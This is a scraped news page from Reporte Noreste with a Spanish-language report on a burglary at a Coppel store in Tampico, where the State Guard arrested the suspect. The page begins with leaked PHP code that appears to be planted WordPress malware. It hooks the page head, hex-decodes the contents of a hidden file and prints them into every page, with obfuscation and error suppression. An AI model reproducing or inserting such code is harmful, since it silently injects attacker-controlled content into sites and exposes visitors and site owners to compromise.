if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Ladrón se mete a Coppel a robar y es capturado por la Guardia Estatal – Reporte Noreste
Conéctate con nosotros

Sur de Tamaulipas

Ladrón se mete a Coppel a robar y es capturado por la Guardia Estatal

Ladrón se mete a Coppel a robar y es capturado por la Guardia Estatal

Tampico, Tamaulipas.- Un sujeto se introdujo a una tienda departamental en la zona centro de Tampico y sustrajo diversos artículos, para después escapar en un auto, siendo capturado por elementos de la Guardia Estatal y puesto a disposición de la Fiscalía.

El incidente ocurrió alrededor de las 3.30 horas de este miércoles en la sucursal Coppel de la calle Díaz Mirón de la zona centro de la ciudad.

El tipo al parecer ingresó por uno de los balcones que se ubican frente de la tienda, pues uno de los cristales se encontraba roto.

Se dio a conocer que cuando el delincuente se encontraba dentro, se recibió el reporte de robo en la central de emergencias C5, notificándose a elementos de Guardia Estatal cercanos al lugar.

En el operativo de emergencia, fue encontrado un sujeto abordo de un auto Jetta y al ser retenido para revisión se le encontraron diversos objetos como Laptos, perfumes y ropa, que finalmente reconoció que los había robado de la tienda.

El delincuente fue puesto a disposición de la Fiscalía General de justicia.

Inició carrera en medios en 1996. Ha participado como reportero en medios impresos y electrónicos conductor de noticias en radio y televisión.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Sur de Tamaulipas